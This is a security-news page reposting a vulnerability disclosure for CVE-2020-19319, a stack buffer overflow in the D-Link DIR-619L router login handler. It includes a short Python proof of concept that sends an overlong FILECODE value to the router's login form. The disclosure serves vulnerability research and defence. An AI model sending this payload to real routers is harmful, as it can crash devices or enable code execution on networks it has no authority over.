Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2020-19319: GitHub - hhhhu8045759/dir_619l-buffer-overflow: The router is set to open the graphical login. An unauthorized attacker can send attack packets to cause code execution.

Buffer overflow vulnerability in DLINK 619L version B 2.06beta via the FILECODE parameter on login.

CVE
#vulnerability#web#js#git#buffer_overflow#auth

dir_619l-buffer-overflow

Vender :D-Link

Firmware version:2.06beta

Exploit Author: ys110

Vendor Homepage: http://www.dlink.com.cn/

Hardware Link:http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-619L

Vul detail

In the handler of router / goform / Login, the http request parameter “filecode” is obtained through the webgetvar function

When the router login webpage is set to log in with the verification code, the filecode parameter is assigned to the a1 register and transmitted to the getauthcode function

The filecode parameter in the getauthcode function is Copy it into the a2 register, the sprintf function copies it to the local stack, however, it does not check the length, and a very long input could lead to stack overflow and overwrite the return address:

poc

import requests import sys import struct import string import base64 def login(shellcode,user,password,ip): postData = { 'login_name’:’yuanshuo’, 'curTime’:"12345", 'FILECODE’:"a"*300, 'VER_CODE’:’vercode’, 'VERIFICATION_CODE’:’12345’, 'login_n’:user, 'login_pass’:password, } response = requests.post('http://192.168.1.1/goform/formLogin’,data=postData)

    #print 'http://' + ip + '/goform/formLogin'
    print response.json

if __name__ == "__main__": login(shellcode,’admin’, base64.b64encode(‘shuoshuo110’),’192.168.1.1’)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907